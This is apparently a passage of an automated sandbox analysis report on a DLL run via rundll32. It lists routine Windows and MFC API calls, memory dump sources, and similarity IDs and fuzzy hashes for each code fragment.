                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(023A1520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,CD5FCEB9), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                      • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                      • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                      • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                      • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                      • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                      • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
